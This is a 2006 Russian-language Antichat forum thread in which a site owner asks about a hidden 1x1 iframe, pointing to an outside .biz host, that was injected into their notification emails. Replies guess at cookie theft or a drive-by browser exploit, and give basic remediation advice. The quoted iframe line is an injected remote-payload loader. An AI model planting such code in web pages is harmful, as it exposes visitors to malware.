ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Пытались хакнуть
  #1  
Старый 03.08.2006, 20:13
Аватар для CraZy I izzi
CraZy I izzi
Новичок
Регистрация: 28.07.2006
Сообщений: 9
Провел на форуме:
7856

Репутация: 0
Question Пытались хакнуть

Здрасти) у меня на сайте была обнаружена вот такая строчка

Код:
<iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe>
вставлена она была в формы с текстом отсылаемые юзерам при новом ПМ или о письме с \"Обратной связи\" ...

Какие последствия могут быть? И чего мог добиться хакер?

Спасибо)
 
Ответить с цитированием

  #2  
Старый 03.08.2006, 20:15
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

знакомая строчка.
такая приписывалась с слоите RST помоему..для IPB 2.1.6..

CraZy I izzi, последствия мы можем только гадать. Скорее всего кража кукисов..
 
Ответить с цитированием

  #3  
Старый 03.08.2006, 20:21
Аватар для CraZy I izzi
CraZy I izzi
Новичок
Регистрация: 28.07.2006
Сообщений: 9
Провел на форуме:
7856

Репутация: 0
По умолчанию

мдя)) не повезло мне))

что посоветуете делать? чтоб такого больше не произашло?
 
Ответить с цитированием

  #4  
Старый 03.08.2006, 20:22
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

я конечно не специалист, но я не смог бы с помощью фрейма без явы спереть куки, а вот троянчик закачать через сплойт к ослу вполне возможно
 
Ответить с цитированием

  #5  
Старый 03.08.2006, 20:26
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

нда, макс дело говорит...

что делать? Ну наверно сменить пароль на всякий пожарный. И забанить по Ip чела -)
 
Ответить с цитированием

  #6  
Старый 03.08.2006, 20:29
Аватар для CraZy I izzi
CraZy I izzi
Новичок
Регистрация: 28.07.2006
Сообщений: 9
Провел на форуме:
7856

Репутация: 0
По умолчанию

эти меры уже приняты ..

может ещё что посаветуете? или где можно почитать инфу об этом?
 
Ответить с цитированием

  #7  
Старый 03.08.2006, 20:35
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

https://forum.antichat.ru/showpost.php?p=175930&postcount=3
гм.. разные adv, но смысл тот же..
Молодец, правильно все делаешь.
 
Ответить с цитированием

  #8  
Старый 03.08.2006, 20:40
Аватар для genom--
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию

ищи дырку както уж он вставил это---- а насчет последствий мож просто клики на вас зарабатывал =)
 
Ответить с цитированием

  #9  
Старый 04.08.2006, 03:26
Аватар для podkashey
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию

Цитата:
<iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe>
Очень похоже на ссылку, которая ставится для юзания дыр ИЕ и установки тул-бара дополнительного, спайвэа и тд.... ИМХО, это она и есть...

Цитата:
а на будущее счобы не спрашивать что он мог сделать открой по сслыке скрипт-- без выполнения или слей его качалкой-- и позырь что он делает
Надо порсто весь сайт выкачивать, потом полазить по файлам и найти все пароли. Все настоящие хакеры так делают!!!
 
Ответить с цитированием

  #10  
Старый 04.08.2006, 10:00
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

dinar_007, прекрати флеймить..

ребят, вы хоть видели, что там даже сайта нет?

"Fedora Core Test Page"

Побоялись зайти?)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите хакнуть ~killer~ Чаты 10 13.02.2005 14:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ